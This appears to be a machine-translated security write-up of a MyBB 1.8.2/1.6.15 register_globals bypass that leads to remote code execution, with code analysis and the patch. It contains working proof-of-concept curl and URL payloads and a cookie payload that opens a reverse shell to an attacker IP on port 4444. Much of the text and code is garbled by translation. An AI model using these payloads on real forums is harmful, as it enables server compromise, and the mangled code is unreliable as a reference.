Catalogue
1. Vulnerability Description 2. Vulnerability trigger Condition 3. Vulnerability Impact Range 4. Vulnerability Code Analysis 5. Defense Method 6. Defensive thinking
1. Vulnerability description
MyBB ' s unset_globals () function can be bypassed under special conditions and it's possible to allows remote code Executio N.
Relevant Link:
https://cxsecurity.com/issue/WLB-2015120164https://packetstormsecurity.com/files/134833/ mybb-1.8.2-code-execution.htmlhttps://www.exploit-db.com/exploits/35323/
2. Vulnerability Trigger Condition
0x1:poc1
PHP.ini configuration 1. Request_order = "GP" 2. register_globals = on//remote code execution by just using Curl on the command line3. Curl--cookie "Globals=1; Shutdown_functions[0][function]=phpinfo; Shutdown_functions[0][arguments][]=-1 "http://30.9.192.207/mybb_1802/
PHP Automated Validation Scripts
0x2:poc2
Php.ini1. Disable_functions = Ini_get2. Register_globals = On//url3. Index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
0x3:poc3
PHP.ini configuration 1. Request_order = "GP" 2. Register_globals = On//urlcurl--cookie "Globals=1; Shutdown_queries[]=sql_inj "Http://www.target/css.php//Works on disable_functions = ini_get and register\_globals = on: Css.php?shutdown_queries[]=sql_inj
3. Vulnerability Impact Range
MYBB 1.8 <= 1.8.2 and MYBB 1.6 <= 1.6.15
4. Vulnerability Code Analysis
\mybb_1802\inc\class_core.php
. If we ' ve got register globals on, then kill them Too/*when PHP's register_globals configuration set on, MYBB would call Unset_globals () Functionall global variables registered by PHP from $_post, $_get, $_files, and $_cookie arrays would be de Stroyed. This is a security mechanism that MYBB does, at the beginning of each PHP script request, "Hyper global variable Autoenrollment reverse processing", to counteract the security issues that may arise from the Register_globals */if (@ini_get ("Register_ Globals ") = = 1) {$this->unset_globals ($_post); $this->unset_globals ($_get); $this->unset_globals ($_files); $this->unset_globals ($_cookie);}. /** * Unsets globals from a specific array. * * @param array the array to unset from. */function unset_globals ($array) {if (!is_array ($array)) {return; } foreach (Array_keys ($array) as $key) {unset ($GLOBALS [$key]); Unset ($GLOBALS [$key]); Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4}}
This logic seems to be fine, and it is defensive for security reasons, but because of some features of the PHP kernel, the execution of the Unset_globals () function can be bypassed
1. Under normal circumstances, through the GPC mode input variable, even if the register_globals is turned on, it will be automatically unset $GLOBAL [$var] processing, which is mybb himself to implement a set of defense low version of PHP error Register_ Globals = on code logic, which defends against the occurrence of local variable overrides 2. But there is a special variable GLOBALS, $GLOBALS Super Global array is the PHP kernel is responsible for creating maintenance, we can read and write anywhere in the program $globals[' key '],php kernel bound $globals array and global symbol The connection between table 3. If the hacker comes in: foo.php? Globals=1, the MYBB executes unset ($GLOBALS ["GLOBALS"]), which directly results in a connection between $globals and the global symbol table 4. And this direct result is $_get, $_post, $_cookie. Can no longer obtain the user passed in the parameter key, because the intrinsic GPC parameters are obtained from the $globals, so the unset operation will not work properly
It is important to note that this problem is noted in MyBB's defensive framework \mybb_1802\inc\class_core.php
.. function __construct () { //Set up mybb $protected = Array ("_get", "_post", "_server", "_cookie", "_files", "_env" , "GLOBALS"); foreach ($protected as $var) { if (isset ($_request[$var]) | | isset ($_files[$var]) {die ("Hacking Attempt "); } } ..
MyBB's intention is to prevent get/post/globals in the request parameter, which may affect the parameters of global variables, but the problem in PHP $_request is also a super-global variable, its value is affected by php.ini, after PHP5.3, request_ Order = "GP", that is, the $_request only includes the parameters in the Get/post, which leads directly to the filtering of the sensitive parameters of the cookie, so the hacker can put a variable overlay attack in the cookie payload
Globals=1; Shutdown_functions[0][function]=exec; shutdown_functions[0][arguments][]=php%20%2dr%20%27%24sock%3dfsockopen%28%22$yourip%22%2c%204444%29%3bexec%28% 22%2fbin%2fsh%20%2di%20%3c%263%20%3e%263%202%3e%263%22%29%3b%27;
To sum it up, there are 2 scenarios for the use of the prerequisites
Understanding the premise of the variable overlay, the next step is to see how the attack payload constructs and triggers a local variable overlay \mybb_1802\inc\class_core.php
class_core.php almost all page scripts will be called to the file, the following destructor will be frequently called function __destruct () { //Run shutdown function if (function _exists ("Run_shutdown")) { run_shutdown (); }}
Run_shutdown (); \mybb_1802\inc\functions.php
/** * Runs The shutdown items after the page have been sent to the browser. * */function Run_shutdown () { //the $shutdown _functions is initialized via Add\_shutdown () function in init.php But because of the existence of local variable coverage vulnerability, here $shutdown_functions can be hijacked global $config, $db, $cache, $plugins, $error _handler, $shutdown _ Functions, $shutdown _queries, $done _shutdown, $mybb; if ($done _shutdown = = True | |! $config | | (Isset ($error _handler) && $error _handler->has_errors)) { return; } . . Run Any shutdown functions if we have them if (Is_array ($shutdown _functions)) { foreach ($shutdown _ functions as $function) { Call_user_func_array ($function [' function '], $function [' arguments ']); } } ..
Relevant Link:
http://0day.today/exploit/22913
5. Defense Methods
\inc\class_core.php
Class MyBB { ... function __construct () { //Set up mybb $protected = Array ("_get", "_post", "_server", "_cookie", "_files", " _env "," GLOBALS "); foreach ($protected as $var) { /*if (isset ($_request[$var)) | | isset ($_files[$var)) */ if (Isset ($_get[$ var]) | | Isset ($_post[$var]) | | Isset ($_cookie[$var]) | | Isset ($_files[$var]) {die ("Hacking attempt");} } ..
Relevant Link:
http://blog.mybb.com/2014/11/20/mybb-1-8-3-1-6-16-released-security-releases/http://cn.313.ninja/exploit/22913
6. Defensive Thinking
Copyright (c) Little5ann All rights reserved